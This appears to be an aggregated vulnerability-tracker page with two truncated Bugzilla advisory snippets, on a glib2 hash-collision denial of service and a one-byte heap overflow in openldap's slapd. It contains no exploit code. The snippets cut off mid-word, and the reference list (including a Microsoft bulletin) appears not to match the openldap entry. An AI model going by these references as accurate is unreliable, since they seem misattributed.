CVE-2012-0039 glib2: hash table collisions CPU usage DoS
bugzilla·2012-01-09·CVSS 7.5
CVE-2012-0039 [HIGH] CVE-2012-0039 glib2: hash table collisions CPU usage DoS
CVE-2012-0039 glib2: hash table collisions CPU usage DoS
It was reported [1] (and the original report [2]) that glib2 also suffers from algorithmic complexity attacks as described in oCERT-2011-003. While this was originally reported to upstream in 2003, it does not look as though anything was done to correct the problem. According to the Debian report, current glib2 is still vulnerable.
Doing a lookup on other g_str_hash() functions, the following packages may also be vulnerable if they copied code from glib2:
arts-1.5.10/flow/gsl/gslglib.c:172: guint g_str_hash (gconstpointer key)
gettext-0.17/gettext-tools/gnulib-lib/glib/gstring.c:97: g_str_hash (gconstpointer v)
pkg-config-0.23/glib-1.2.10/gstring.c:72: g_str_hash (gconstpointer key)
In addition to the above, the following are als
Bugzilla
CVE-2011-4079 openldap: one-byte buffer overflow in slapd
bugzilla·2011-10-26·CVSS 4.0
CVE-2011-4079 [MEDIUM] CVE-2011-4079 openldap: one-byte buffer overflow in slapd
CVE-2011-4079 openldap: one-byte buffer overflow in slapd
A bug in slapd's UTF8StringNormalize() function can cause a one-byte buffer overflow when it is passed a zero-length string. The code then writes a '\0' past the one-byte long buffer allocated on the heap, which could possibly allow a remote authenticated user to crash slapd. As per the upstream report [1], this bug has been present since 2003-04-07 [2] so should affect all versions of openldap we currently ship.
A patch to correct the flaw has been committed [3] (depends on the previous patch [4]).
[1] http://www.openldap.org/its/index.cgi/Software%20Bugs?id=7059;selectid=7059
[2] http://www.openldap.org/devel/gitweb.cgi?p=openldap.git;a=commitdiff;h=67d6b23d
[3] http://www.openldap.org/devel/gitweb.cgi?p=openldap.git;a=commitdi
References
http://securityreason.com/securityalert/8473
http://www.securitytracker.com/id?1026165
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13103
Published: 2011-10-12